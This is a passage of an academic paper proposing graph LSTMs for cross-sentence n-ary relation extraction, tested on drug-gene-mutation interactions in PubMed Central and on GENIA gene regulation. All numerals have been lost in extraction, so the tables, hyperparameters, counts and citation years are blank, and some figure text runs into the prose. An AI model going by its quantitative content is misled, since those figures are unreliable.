n increases, it becomes increasingly rare that the related entities will be contained entirely in a single sentence. in this paper, we generalize extraction to cross-sentence, n-ary relations, where m > and t can contain multiple sentences. as will be shown in our experiments section, n-ary relations are crucial for high-value domains such as biomedicine, and expanding beyond the sentence boundary enables the extraction of more knowledge. in the standard binary-relation setting, the dom- inant approaches are generally defined in terms of the shortest dependency path between the two en- tities in question, either by deriving rich features from the path or by modeling it using deep neural networks. generalizing this paradigm to the n-ary setting is challenging, as there are ( n ) paths. one apparent solution is inspired by davidsonian seman- tics: first, identify a single trigger phrase that sig- nifies the whole relation, then reduce the n-ary re- lation to n binary relations between the trigger and an argument. however, challenges remain. it is of- ten hard to specify a single trigger, as the relation is manifested by several words, often not contigu- ous. moreover, it is expensive and time-consuming to annotate training examples, especially if triggers are required, as is evident in prior annotation efforts such as genia (kim et al., ). the realistic and widely adopted paradigm is to leverage indirect su- pervision, such as distant supervision (craven and kumlien, ; mintz et al., ), where triggers are not available. additionally, lexical and syntactic patterns signi- fying the relation will be sparse. to handle such sparsity, traditional feature-based approaches require extensive engineering and large data. unfortunately, this challenge becomes much more severe in cross- sentence extraction when the text spans multiple sen- tences. to overcome these challenges, we explore a gen- eral relation extraction framework based on graph lstms. by learning a continuous representation for words and entities, lstms can handle sparsity effectively without requiring intense feature engineer- ing. the graph formulation subsumes prior lstm approaches based on chains or trees, and can incor- porate rich linguistic analyses. this approach also opens up opportunities for joint learning with related relations. for example, the response relation over d,g,v also implies a binary sub-relation over drug d and mutation v, with the gene underspecified. even with distant supervision, the supervision signal for n-ary relations will likely be sparser than their binary sub-relations. our ap- proach makes it very easy to use multi-task learning over both the n-ary relations and their sub-relations. graph lstms learning a continuous representation can be effective for dealing with lexical and syntactic sparsity. for se- quential data such as text, recurrent neural networks (rnns) are quite popular. they resemble hidden contextual entity representation c w( ) …… w(n- ) w(n) … … … … word embeddings for input text ( ) concatenation rela%on classifier r …… rk graph lstm … … figure : a general architecture for cross-sentence n-ary relation extraction based on graph lstms. markov models (hmms), except that discrete hid- den states are replaced with continuous vectors, and emission and transition probabilities with neural net- works. conventional rnns with sigmoid units suffer from gradient diffusion or explosion, making train- ing very difficult (bengio et al., ; pascanu et al., ). long short-term memory (lstms) (hochre- iter and schmidhuber, ) combats these problems by using a series of gates (input, forget and output) to avoid amplifying or suppressing gradients during backpropagation. consequently, lstms are much more effective in capturing long-distance dependen- cies, and have been applied to a variety of nlp tasks. however, most approaches are based on linear chains and only explicitly model the linear context, which ignores a variety of linguistic analyses, such as syn- tactic and discourse dependencies. in this section, we propose a general framework that generalizes lstms to graphs. while there is some prior work on learning tree lstms (tai et al., ; miwa and bansal, ), to the best of our knowledge, graph lstms have not been applied to any nlp task yet. figure shows the architecture of this approach. the input layer is the word embedding of input text. next is the graph lstm which learns a contextual representation for each word. for the entities in question, their contextual representations are concatenated and become the input to the relation classifiers. for a multi-word entity, we simply used the average of its word representations and leave the exploration of more sophisticated aggregation approaches to future work. the layers are trained jointly with backpropagation. this framework is all patients were treated with gefitinib and showed a partial response. ◦→◦→◦→◦→◦→◦→◦→◦→◦→◦→◦ ◦←◦←◦←◦←◦←◦←◦←◦←◦←◦←◦ figure : the graph lstms used in this paper. the document graph (top) is partitioned into two directed acyclic graphs (bottom); the graph lstms is constructed by a forward pass (left to right) followed by a backward pass (right to left). note that information goes from dependency child to parent. agnostic to the choice of classifiers. jointly designing classifiers with graph lstms would be interesting future work. at the core of the graph lstm is a document graph that captures various dependencies among the input words. by choosing what dependencies to in- clude in the document graph, graph lstms naturally subsumes linear-chain or tree lstms. compared to conventional lstms, the graph for- mulation presents new challenges. due to potential cycles in the graph, a straightforward implementation of backpropagation might require many iterations to reach a fixed point. moreover, in the presence of a po- tentially large number of edge types (adjacent-word, syntactic dependency, etc.), parametrization becomes a key problem. in the remainder of this section, we first introduce the document graph and show how to conduct back- propagation in graph lstms. we then discuss two strategies for parametrizing the recurrent units. fi- nally, we show how to conduct multi-task learning with this framework. . document graph to model various dependencies from linguistic analy- sis at our disposal, we follow quirk and poon ( ) and introduce a document graph to capture intra- and inter-sentential dependencies. a document graph consists of nodes that represent words and edges that represent various dependencies such as linear context (adjacent words), syntactic dependencies, and discourse relations (lee et al., ; xue et al., ). figure shows the document graph for our running example; this instance suggests that tumors with l e mutation in egfr gene responds to the drug gefitinib. this document graph acts as the backbone upon which a graph lstm is constructed. if it con- tains only edges between adjacent words, we recover linear-chain lstms. similarly, other prior lstm approaches can be captured in this framework by re- stricting edges to those in the shortest dependency path or the parse tree. . backpropagation in graph lstms conventional lstms are essentially very deep feed- forward neural networks. for example, a left-to-right linear lstm has one hidden vector for each word. this vector is generated by a neural network (re- current unit) that takes as input the embedding of the given word and the hidden vector of the previ- ous word. in discriminative learning, these hidden vectors then serve as input for the end classifiers, from which gradients are backpropagated through the whole network. generalizing such a strategy to graphs with cycles typically requires unrolling recurrence for a number of steps (scarselli et al., ; li et al., ; liang et al., ). essentially, a copy of the graph is created for each step that serves as input for the next. the result is a feed-forward neural network through time, and backpropagation is conducted accordingly. in principle, we could adopt the same strategy. ef- fectively, gradients are backpropagated in a manner similar to loopy belief propagation (lbp). however, this makes learning much more expensive as each up- date step requires multiple iterations of backpropaga- tion. moreover, loopy backpropagation could suffer from the same problems encountered to in lbp, such as oscillation or failure to converge. we observe that dependencies such as coreference and discourse relations are generally sparse, so the backbone of a document graph consists of the lin- ear chain and the syntactic dependency tree. as in belief propagation, such structures can be leveraged to make backpropagation more efficient by replac- ing synchronous updates, as in the unrolling strat- egy, with asynchronous updates, as in linear-chain lstms. this opens up opportunities for a variety of strategies in ordering backpropagation updates. in this paper, we adopt a simple strategy that per- formed quite well in preliminary experiments, and leave further exploration to future work. specifi- cally, we partition the document graph into two di- rected acyclic graphs (dags). one dag contains the left-to-right linear chain, as well as other forward- pointing dependencies. the other dag covers the right-to-left linear chain and the backward-pointing dependencies. figure illustrates this strategy. effec- tively, we partition the original graph into the forward pass (left-to-right), followed by the backward pass (right-to-left), and construct the lstms accordingly. when the document graph only contains linear chain edges, the graph lstms is exactly a bi-directional lstms (bilstms). . the basic recurrent propagation unit a standard lstm unit consists of an input vector (word embedding), a memory cell and an output vec- tor (contextual representation), as well as several gates. the input gate and output gate control the information flowing into and out of the cell, whereas the forget gate can optionally remove information from the recurrent connection to a precedent unit. in linear-chain lstms, each unit contains only one forget gate, as it has only one direct precedent (i.e., the adjacent-word edge pointing to the previous word). in graph lstms, however, a unit may have several precedents, including connections to the same word via different edges. we thus introduce a forget gate for each precedent, similar to the approach taken by tai et al. ( ) for tree lstms. encoding rich linguistic analysis introduces many distinct edge types besides word adjacency, such as syntactic dependencies, which opens up many possi- bilities for parametrization. this was not considered in prior syntax-aware lstm approaches (tai et al., ; miwa and bansal, ). in this paper, we ex- plore two schemes that introduce more fined-grained parameters based on the edge types. full parametrization our first proposal simply in- troduces a different set of parameters for each edge type, with computation specified below. it = σ(wixt + ∑ j∈p(t) u m(t,j) i hj + bi) ot = σ(woxt + ∑ j∈p(t) um(t,j)o hj + bo) c̃t = tanh(wcxt + ∑ j∈p(t) um(t,j)c hj + bc) ftj = σ(wfxt + u m(t,j) f hj + bf) ct = it � c̃t + ∑ j∈p(t) ftj � cj ht = ot � tanh(ct) as in standard chain lstms, xt is the input word vector for node t, ht is the hidden state vector for node t, w ’s are the input weight matrices, and b’s are the bias vectors. σ, tanh, and � represent the sig- moid function, the hyperbolic tangent function, and the hadamard product (pointwise multiplication), re- spectively. the main differences lie in the recurrence terms. in graph lstms, a unit might have multiple predecessors (p(t)), for each of which (j) there is a forget gate ftj, and a typed weight matrix um(t,j), where m(t,j) signifies the connection type between t and j. the input and output gates (it,ot) depend on all predecessors, whereas the forget gate (ftj) only depends on the predecessor with which the gate is associated. ct and c̃t represent intermediate compu- tation results within the memory cell, which take into account the input and forget gates, and will be combined with output gate to produce the hidden representation ht. full parameterization is straightforward, but it re- quires a large number of parameters when there are many edge types. for example, there are dozens of syntactic edge types, each corresponding to a stan- ford dependency label. as a result, in our exper- iments we resort to using only the coarse-grained types: word adjacency, syntactic dependency, etc. next, we will consider a more fine-grained approach by learning an edge-type embedding. edge-type embedding to reduce the number of parameters and leverage potential correlation among fine-grained edge types, we learned a low- dimensional embedding of the edge types, and con- ducted an outer product of the predecessor’s hidden vector and the edge-type embedding to generate a “typed hidden representation”, which is a matrix. the new computation is as follows: it = σ(wixt + ∑ j∈p(t) ui ×t (hj ⊗ej) + bi) ftj = σ(wfxt + uf ×t (hj ⊗ej) + bf) ot = σ(woxt + ∑ j∈p(t) uo ×t (hj ⊗ej) + bo) c̃t = tanh(wcxt + ∑ j∈p(t) uc ×t (hj ⊗ej) + bc) ct = it � c̃t + ∑ j∈p(t) ftj � cj ht = ot � tanh(ct) u’s are now l× l×d tensors (l is the dimension of the hidden vector and d is the dimension for edge- type embedding), and hj ⊗ ej is a tensor product that produces an l ×d matrix. ×t denotes a tensor dot product defined as t ×t a = ∑ d(t:,:,d ·a:,d), which produces an l-dimensional vector. the edge- type embedding ej is jointly trained with the other parameters. . comparison with prior lstm approaches the main advantages of a graph formulation are its generality and flexibility. as seen in section . , linear-chain lstms are a special case when the doc- ument graph is the linear chain of adjacent words. similarly, tree lstms (tai et al., ) are a special case when the document graph is the parse tree. in graph lstms, the encoding of linguistic knowl- edge is factored from the backpropagation strategy (section . ), making it much more flexible, includ- ing introducing cycles. for example, miwa and bansal ( ) conducted joint entity and binary re- lation extraction by stacking a lstm for relation extraction on top of another lstm for entity recog- nition. in graph lstms, the two can be combined seamlessly using a document graph comprising both the word-adjacency chain and the dependency path between the two entities. the document graph can also incorporate other linguistic information. for example, coreference and discourse parsing are intuitively relevant for cross-sentence relation extraction. although existing systems have not yet been shown to improve cross- sentence relation extraction (quirk and poon, ), it remains an important future direction to explore incorporating such analyses, especially after adapting them to the biomedical domains (bell et al., ). . multi-task learning with sub-relations multi-task learning has been shown to be beneficial in training neural networks (caruana, ; collobert and weston, ; peng and dredze, ). by learning contextual entity representations, our frame- work makes it straightforward to conduct multi-task learning. the only change is to add a separate classi- fier for each related auxiliary relation. all classifiers share the same graph lstms representation learner and word embeddings, and can potentially help each other by pooling their supervision signals. in the molecular tumor board domain, we applied this paradigm to joint learning of both the ternary rela- tion (drug-gene-mutation) and its binary sub-relation (drug-mutation). experiment results show that this provides significant gains in both tasks. implementation details we implemented our methods using the theano li- brary (theano development team, ). we used logistic regression for our relation classifiers. hyper parameters were set based on preliminary experi- ments on a small development dataset. training was done using mini-batched stochastic gradient descent (sgd) with batch size . we used a learning rate of . and trained for at most epochs, with early stopping based on development data (caruana et al., ; graves et al., ). the dimension for the hidden vectors in lstm units was set to , and the dimension for the edge-type embedding was set to . the word embeddings were initialized with the pub- licly available -dimensional glove word vectors trained on billion words from wikipedia and web text (pennington et al., ). other model param- eters were initialized with random samples drawn uniformly from the range [− , ]. in multi-task training, we alternated among all tasks, each time passing through all data for one task , and updating the parameters accordingly. this was repeated for epochs. http://nlp.stanford.edu/projects/glove/ however, drug-gene pairs have much more data, so we sub- sampled the instances down to the same size as the main n-ary relation task. domain: molecular tumor boards our main experiments focus on extracting ternary interactions over drugs, genes and mutations, which is important for molecular tumor boards. a drug- gene-mutation interaction is broadly construed as an association between the drug efficacy and the muta- tion in the given gene. there is no annotated dataset for this problem. however, due to the importance of such knowledge, oncologists have been painstakingly curating known relations from reading papers. such a manual approach cannot keep up with the rapid growth of the research literature, and the coverage is generally sparse and not up to date. however, the cu- rated knowledge can be used for distant supervision. . datasets we obtained biomedical literature from pubmed cen- tral , consisting of approximately one million full- text articles as of . note that only a fraction of papers contain knowledge about drug-gene-mutation interactions. extracting such knowledge from the vast body of biomedical papers is exactly the chal- lenge. as we will see in later subsections, distant supervision enables us to generate a sizable train- ing set from a small number of manually curated facts, and the learned model was able to extract or- ders of magnitude more facts. in future work, we will explore incorporating more known facts for dis- tant supervision and extracting from more full-text articles. we conducted tokenization, part-of-speech tag- ging, and syntactic parsing using splat (quirk et al., ), and obtained stanford dependencies (de marneffe et al., ) using stanford corenlp (man- ning et al., ). we used the entity taggers from literome (poon et al., ) to identify drug, gene and mutation mentions. we used the gene drug knowledge database (gdkd) (dienstmann et al., ) and the clini- cal interpretations of variants in cancer (civic) knowledge base for distant supervision. the knowl- edge bases distinguish fine-grained interaction types, which we do not use in this paper. http://www.ncbi.nlm.nih.gov/pmc/ http://civic.genome.wustl.edu . distant supervision after identifying drug, gene and mutation mentions in the text, co-occurring triples with known interac- tions were chosen as positive examples. however, unlike the single-sentence setting in standard dis- tant supervision, care must be taken in selecting the candidates. since the triples can reside in differ- ent sentences, an unrestricted selection of text spans would risk introducing many obviously wrong ex- amples. we thus followed quirk and poon ( ) in restricting the candidates to those occurring in a minimal span, i.e., we retain a candidate only if is no other co-occurrence of the same entities in an overlapping text span with a smaller number of con- secutive sentences. furthermore, we avoid picking unlikely candidates where the triples are far apart in the document. specifically, we considered en- tity triples within k consecutive sentences, ignoring paragraph boundaries. k = corresponds to the baseline of extraction within single sentences. we explored k ≤ , which captured a large fraction of candidates without introducing many unlikely ones. only distinct drug-gene-mutation triples from the knowledge bases were matched in the text. even from such a small set of unique triples, we obtained , ternary relation instances that can serve as pos- itive examples. for multi-task learning, we also con- sidered drug-gene and drug-mutation sub-relations, which yielded , drug-gene and , drug- mutation relation instances as positive examples. we generate negative examples by randomly sam- pling co-occurring entity triples without known inter- actions, subject to the same restrictions above. we sampled the same number as positive examples to obtain a balanced dataset . . automatic evaluation to compare the various models in our proposed framework, we conducted five-fold cross-validation, treating the positive and negative examples from dis- tant supervision as gold annotation. to avoid train- test contamination, all examples from a document were assigned to the same fold. since our datasets are balanced by construction, we simply report aver- age test accuracy on held-out folds. obviously, the we will release the dataset at http://hanover.azurewebsites.net. model single-sent. cross-sent. feature-based . . cnn . . bilstm . . graph lstm - embed . . graph lstm - full . . table : average test accuracy in five-fold cross- validation for drug-gene-mutation ternary interac- tions. feature-based used the best performing model in (quirk and poon, ) with features derived from shortest paths between all entity pairs. model single-sent. cross-sent. feature-based . . cnn . . bilstm . . bilstm-shortest-path . . tree lstm . . graph lstm-embed . . graph lstm-full . . table : average test accuracy in five-fold cross- validation for drug-mutation binary relations, with an extra baseline using a bilstm on the shortest dependency path (xu et al., b; miwa and bansal, ). results could be noisy (e.g., entity triples not known to have an interaction might actually have one), but this evaluation is automatic and can quickly evaluate the impact of various design choices. we evaluated two variants of graph lstms: “graph lstm-full” with full parametrization and “graph lstm-embed” with edge-type embedding. we compared graph lstms with three strong base- line systems: a well-engineered feature-based classi- fier (quirk and poon, ), a convolutional neural network (cnn) (zeng et al., ; santos et al., ; wang et al., ), and a bi-directional lstm (bilstm). following wang et al. ( ), we used in- put attention for the cnn and a input window size of . quirk and poon ( ) only extracted binary rela- tions. we extended it to ternary relations by deriving features for each entity pair (with added annotation to signify the two entity types), and pooling the features from all pairs. for binary relation extraction, prior syntax-aware approaches are directly applicable. so we also compared with a state-of-the-art tree lstm system (miwa and bansal, ) and a bilstm on the shortest dependency path between the two entities (bilstm-shortest-path) (xu et al., b). table shows the results for cross-sentence, ternary relation extraction. all neural-network based models outperformed the feature-based classifier, il- lustrating their advantage in handling sparse linguis- tic patterns without requiring intense feature engi- neering. all lstms significantly outperformed cnn in the cross-sentence setting, verifying the impor- tance in capturing long-distance dependencies. the two variants of graph lstms perform on par with each other, though graph lstm-full has a small advantage, suggesting that further exploration of parametrization schemes could be beneficial. in particular, the edge-type embedding might improve by pretraining on unlabeled text with syntactic parses. both graph variants significantly outperformed bilstms (p < . by mcnemar’s chi-square test), though the difference is small. this result is intrigu- ing. in quirk and poon ( ), the best system in- corporated syntactic dependencies and outperformed the linear-chain variant (base) by a large margin. so why didn’t graph lstms make an equally substantial gain by modeling syntactic dependencies? one reason is that linear-chain lstms can already captured some of the long-distance dependencies available in syntactic parses. bilstms substantially outperformed the feature-based classifier, even with- out explicit modeling of syntactic dependencies. the gain cannot be entirely attributed to word embedding as lstms also outperformed cnns. another reason is that syntactic parsing is less accurate in the biomedical domain. parse errors con- fuse the graph lsm learner, limiting the potential for gain. in section , we show supporting evidence in a domain when gold parses are available. we also reported accuracy on instances within single sentences, which exhibited a broadly similar set of trends. note that single-sentence and cross- sentence accuracies are not directly comparable, as the test sets are different (one subsumes the other). we conducted the same experiments on the binary sub-relation between drug-mutation pairs. table drug-gene-mut. drug-mut. bilstm . . +multi-task . . graph lstm . . +multi-task . . table : multi-task learning improved accuracy for both bilstms and graph lstms. shows the results, which are similar to the ternary case: graph lstm-full consistently performed the best for both single sentence and cross-sentence instances. bilstms on the shortest path substan- tially underperformed bilstms or graph lstms, losing between - absolute points in accuracy, which could be attributed to the lower parsing quality in the biomedical domain. interestingly, the state-of-the-art tree lstms (miwa and bansal, ) also under- performed graph lstms, even though they encoded essentially the same linguistic structures (word adja- cency and syntactic dependency). we attributed the gain to the fact that miwa and bansal ( ) used separate lstms for the linear chain and the depen- dency tree, whereas graph lstms learned a single representation for both. to evaluate whether joint learning with sub- relations can help, we conducted multi-task learning using graph lstm-full to jointly train extractors for both the ternary interaction and the drug-mutation, drug-gene sub-relations. table shows the results. multi-task learning resulted in a significant gain for both the ternary interaction and the drug-mutation interaction. interestingly, the advantage of graph lstms over bilstms is reduced with multi-task learning, suggesting that with more supervision sig- nal, even linear-chain lstms can learn to capture long-range dependencies that are were made evident by parse features in graph lstms. note that there are many more instances for drug-gene interaction than others, so we only sampled a subset of comparable size. therefore, we do not evaluate the performance gain for drug-gene interaction, as in practice, one would simply learn from all available data, and the sub-sampled results are not competitive. we included coreference and discourse relations in our document graph. however, we didn’t observe any significant gains, similar to the observation in single-sent. cross-sent. candidates , , p ≥ . , , p ≥ . , gdkd + civic table : numbers of unique drug-gene-mutation in- teractions extracted from pubmed central articles, compared to that from manually curated kbs used in distant supervision. p signifies output probability. quirk and poon ( ). we leave further exploration to future work. . pubmed-scale extraction our ultimate goal is to extract all knowledge from available text. we thus retrained our model using the best system from automatic evaluation (i.e., graph lstm-full) on all available data. the resulting model was then used to extract relations from all pubmed central articles. table shows the number of candidates and ex- tracted interactions. with as little as unique drug- gene-mutation triples from the two databases , we learned to extract orders of magnitude more unique interactions. the results also highlight the benefit of cross-sentence extraction, which yields to times more relations than single-sentence extraction. table conducts a similar comparison on unique number of drugs, genes, and mutations. again, ma- chine reading covers far more unique entities, espe- cially with cross-sentence extraction. . manual evaluation our automatic evaluations are useful for comparing competing approaches, but may not reflect the true classifier precision as the labels are noisy. therefore, we randomly sampled extracted relation instances and asked three researchers knowledgeable in pre- cision medicine to evaluate their correctness. for each instance, the annotators were presented with the provenance: sentences with the drug, gene, and mutation highlighted. the annotators determined in there are more in the databases, but these are the only ones for which we found matching instances in the text. in future work, we will explore various ways to increase the number, e.g., by matching underspecified drug classes to specific drugs. drug gene mut. gdkd + civic single-sent. (p ≥ . ) single-sent. (p ≥ . ) cross-sent. (p ≥ . ) cross-sent. (p ≥ . ) table : numbers of unique drugs, genes and muta- tions in extraction from pubmed central articles, in comparison with that in the manually curated gene drug knowledge database (gdkd) and clinical in- terpretations of variants in cancer (civic) used for distant supervision. p signifies output probability. entity relation precision error error random % % % p ≥ . % % % p ≥ . % % % table : sample precision of drug-gene-mutation interactions extracted from pubmed central articles. p signifies output probability. each case whether this instance implied that the given entities were related. note that evaluation does not attempt to identify whether the relationships are true or replicated in follow-up papers; rather, it focuses on whether the relationships are entailed by the text. we focused our evaluation efforts on the cross- sentence ternary-relation setting. we considered three probability thresholds: . for a high-precision but potentially low-recall setting, . , and a random sample of all candidates. in each case, instances were selected for a total of annotations. a subset of instances were reviewed by two annotators, and the inter-annotator agreement was %. table shows that the classifier indeed filters out a large portion of potential candidates, with estimated instance accuracy of % at the threshold of . , and % at . . interestingly, lstms are effective at screening out many entity mention errors, presum- ably because they include broad contextual features. model precision recall f poon et al. ( ) . . . bilstm . . . graph lstm . . . graph lstm (gold) . . . table : genia test results on the binary relation of gene regulation. graph lstm (gold) used gold syntactic parses in the document graph. domain: genetic pathways we also conducted experiments on extracting genetic pathway interactions using the genia event extrac- tion dataset (kim et al., ). this dataset contains gold syntactic parses for the sentences, which offered a unique opportunity to investigate the impact of syn- tactic analysis on graph lstms. it also allowed us to test our framework in supervised learning. the original shared task evaluated on complex, nested events for nine event types, many of which are unary relations (kim et al., ). following poon et al. ( ), we focused on gene regulation and reduced it to binary-relation classification for head- to-head comparison. we followed their experimental protocol by sub-sampling negative examples to be about three times of positive examples. since the dataset is not entirely balanced, we re- ported precision, recall, and f . we used our best performing graph lstm from the previous experi- ments. by default, automatic parses were used in the document graphs, whereas in graph lstm (gold), gold parses were used instead. table shows the re- sults. once again, despite the lack of intense feature engineering, linear-chain lstms performed on par with the feature-based classifier (poon et al., ). graph lstms exhibited a more commanding advan- tage over linear-chain lstms in this domain, sub- stantially outperforming the latter (p < . by mc- nemar’s chi-square test). most interestingly, graph lstms using gold parses significantly outperformed that using automatic parses, suggesting that encoding high-quality analysis is particularly beneficial. related work most work on relation extraction has been applied to binary relations of entities in a single sentence. we first review relevant work on the single-sentence bi- nary relation extraction task, and then review related work on n-ary and cross-sentence relation extraction. binary relation extraction the traditional feature- based methods rely on carefully designed features to learn good models, and often integrate diverse sources of evidence such as word sequences and syn- tax context (kambhatla, ; guodong et al., ; boschee et al., ; suchanek et al., ; chan and roth, ; nguyen and grishman, ). the kernel-based methods design various subsequence or tree kernels (mooney and bunescu, ; bunescu and mooney, ; qian et al., ) to capture struc- tured information. recently, models based on neural networks have advanced the state of the art by auto- matically learning powerful feature representations (xu et al., a; zhang et al., ; santos et al., ; xu et al., b; xu et al., ). most neural architectures resemble figure , where there is a core representation learner (blue) that takes word embeddings as input and produces contextual entity representations. such representa- tions are then taken by relation classifiers to pro- duce the final predictions. effectively representing sequences of words, both convolutional (zeng et al., ; wang et al., ; santos et al., ) and rnn-based architectures (zhang et al., ; socher et al., ; cai et al., ) have been successful. most of these have focused on modeling either the surface word sequences or the hierarchical syntac- tic structure. miwa and bansal ( ) proposed an architecture that benefits from both types of informa- tion, using a surface sequence layer, followed by a dependency-tree sequence layer. n-ary relation extraction early work on extract- ing relations between more than two arguments has been done in muc- , with a focus on fact/event extraction from news articles (chinchor, ). se- mantic role labeling in the propbank (palmer et al., ) or framenet (baker et al., ) style are also instances of n-ary relation extraction, with extrac- tion of events expressed in a single sentence. mc- donald et al. ( ) extract n-ary relations in a bio- medical domain, by first factoring the n-ary relation into pair-wise relations between all entity pairs, and then constructing maximal cliques of related enti- ties. recently, neural models have been applied to semantic role labeling (fitzgerald et al., ; roth and lapata, ). these works learned neural rep- resentations by effectively decomposing the n-ary relation into binary relations between the predicate and each argument, by embedding the dependency path between each pair, or by combining features of the two using a feed-forward network. although some re-ranking or joint inference models have been employed, the representations of the individual argu- ments do not influence each other. in contrast, we propose a neural architecture that jointly represents n entity mentions, taking into account long-distance dependencies and inter-sentential information. cross-sentence relation extraction several rela- tion extraction tasks have benefited from cross- sentence extraction, including muc fact and event extraction (swampillai and stevenson, ), record extraction from web pages (wick et al., ), extrac- tion of facts for biomedical domains (yoshikawa et al., ), and extensions of semantic role labeling to cover implicit inter-sentential arguments (gerber and chai, ). these prior works have either relied on explicit co-reference annotation, or on the assump- tion that the whole document refers to a single co- herent event, to simplify the problem and reduce the need for powerful representations of multi-sentential contexts of entity mentions. recently, cross-sentence relation extraction models have been learned with distant supervision, and used integrated contextual evidence of diverse types without reliance on these assumptions (quirk and poon, ), but that work focused on binary relations only and explicitly engi- neered sparse indicator features. relation extraction using distant supervision distant supervision has been applied to extraction of binary (mintz et al., ; poon et al., ) and n-ary (reschke et al., ; li et al., ) relations, traditionally using hand-engineered features. neural architectures have recently been applied to distantly supervised extraction of binary relations (zeng et al., ). our work is the first to propose a neural archi- tecture for n-ary relation extraction, where the repre- sentation of a tuple of entities is not decomposable into independent representations of the individual entities or entity pairs, and which integrates diverse information from multi-sentential context. to utilize training data more effectively, we show how multi- task learning for component binary sub-relations can improve performance. our learned representation combines information sources within a single sen- tence in a more integrated and generalizable fashion than prior approaches, and can also improve perfor- mance on single-sentence binary relation extraction. conclusion we explore a general framework for cross-sentence n- ary relation extraction based on graph lstms. the graph formulation subsumes linear-chain and tree lstms and makes it easy to incorporate rich linguis- tic analysis. experiments on biomedical domains showed that extraction beyond the sentence bound- ary produced far more knowledge, and encoding rich linguistic knowledge provided consistent gain. while there is much room to improve in both recall and precision, our results indicate that machine read- ing can already be useful in precision medicine. in particular, automatically extracted facts (section . ) can serve as candidates for manual curation. instead of scanning millions of articles to curate from scratch, human curators would just quickly vet thousands of extractions. the errors identified by curators offer direct supervision to the machine reading system for continuous improvement. therefore, the most im- portant goal is to attain high recall and reasonable precision. our current models are already quite capa- ble. future directions include: interactive learning with user feedback; improving discourse modeling in graph lstms; exploring other backpropagation strategies; joint learning with entity linking; applica- tions to other domains. acknowledgements we thank daniel fried and ming-wei chang for use- ful discussions, as well as the anonymous reviewers and editor-in-chief mark johnson for their helpful comments. references collin baker, charles fillmore, and john lowe. . the berkeley framenet project. in proceedings of the thirty-sixth annual meeting of the association for computational linguistics and seventeenth interna- tional conference on computational linguistics. dane bell, gustave hahn-powell, marco a. valenzuela- escarcega, and mihai surdeanu. . an investi- gation of coreference phenomena in the biomedical domain. in proceedings of the tenth edition of the language resources and evaluation conference. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradient descent is difficult. ieee transactions on neural networks, ( ). elizabeth boschee, ralph weischedel, and alex zama- nian. . automatic information extraction. in proceedings of the international conference on intelli- gence analysis. razvan c bunescu and raymond j mooney. . a shortest path dependency kernel for relation extraction. in proceedings of the conference on empirical meth- ods in natural language processing. rui cai, xiaodong zhang, and houfeng wang. . bidirectional recurrent convolutional neural network for relation classification. in proceedings of the fifty- fourth annual meeting of the association for compu- tational linguistics. rich caruana, steve lawrence, and lee giles. . overfitting in neural nets: backpropagation, conjugate gradient, and early stopping. in proceedings of the fifteenth annual conference on neural information processing systems. rich caruana. . multitask learning. in learning to learn. springer. yee seng chan and dan roth. . exploiting back- ground knowledge for relation extraction. in proceed- ings of the twenty-third international conference on computational linguistics. nancy chinchor. . overview of muc- /met- . technical report, science applications international corporation, san diego, ca. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neural networks with multitask learning. in proceedings of the twenty-fifth international conference on machine learning. mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molecu- lar biology. marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the fifth international conference on language resources and evaluation. rodrigo dienstmann, in sock jang, brian bot, stephen friend, and justin guinney. . database of ge- nomic biomarkers for cancer drugs and clinical tar- getability in solid tumors. cancer discovery, . nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the con- ference on empirical methods in natural language processing. matthew gerber and joyce y. chai. . beyond nom- bank: a study of implicit arguments for nominal predi- cates. in proceedings of the forty-eighth annual meet- ing of the association for computational linguistics. alan graves, abdel-rahman mohamed, and geoffrey hin- ton. . speech recognition with deep recurrent neural networks. in proceedings of the thirty-eighth ieee international conference on acoustics, speech and signal processing. zhou guodong, su jian, zhang jie, and zhang min. . exploring various knowledge in relation extraction. in proceedings of the forty-third annual meeting of the association for computational linguistics. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ). nanda kambhatla. . combining lexical, syntactic, and semantic features with maximum entropy models for extracting relations. in proceedings of the forty- second annual meeting of the association for compu- tational linguistics, demonstration sessions. jin-dong kim, tomoko ohta, sampo pyysalo, yoshi- nobu kano, and jun’ichi tsujii. . overview of bionlp’ shared task on event extraction. in proceed- ings of the workshop on current trends in biomedical natural language processing: shared task. heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational linguis- tics, ( ). hong li, sebastian krause, feiyu xu, andrea moro, hans uszkoreit, and roberto navigli. . improvement of n-ary relation extraction by adding lexical semantics to distant-supervision rule learning. in proceedings of the seventh international conference on agents and artificial intelligence. yujia li, daniel tarlow, marc brockschmidt, and richard zemel. . gated graph sequence neural networks. in proceedings of the fourth international conference on learning representations. xiaodan liang, xiaohui shen, jiashi feng, liang lin, and shuicheng yan. . semantic object parsing with graph lstm. in proceedings of european conference on computer vision. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of the fifty-second annual meeting of the association for computational linguistics: system demonstrations. ryan mcdonald, fernando pereira, seth kulick, scott winters, yang jin, and pete white. . simple algo- rithms for complex relation extraction with applications to biomedical ie. in proceedings of the forty-third annual meeting on association for computational lin- guistics. mike mintz, steven bills, rion snow, and dan juraf- sky. . distant supervision for relation extraction without labeled data. in proceedings of the joint con- ference of the forty-seventh annual meeting of the as- sociation for computational linguistics and the fourth international joint conference on natural language processing. makoto miwa and mohit bansal. . end-to-end re- lation extraction using lstms on sequences and tree structures. in proceedings of the fifty-fourth annual meeting of the association for computational linguis- tics. raymond j mooney and razvan c bunescu. . subse- quence kernels for relation extraction. in proceedings of the nineteen annual conference on neural informa- tion processing systems. thien huu nguyen and ralph grishman. . employ- ing word representations and regularization for domain adaptation of relation extraction. in proceedings of the fifty-second annual meeting of the association for computational linguistics. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of seman- tic roles. computational linguistics, ( ). razvan pascanu, tomas mikolov, and yoshua bengio. . on the difficulty of training recurrent neural networks. in proceedings of the thirtieth international conference on machine learning. nanyun peng and mark dredze. . improving named entity recognition for 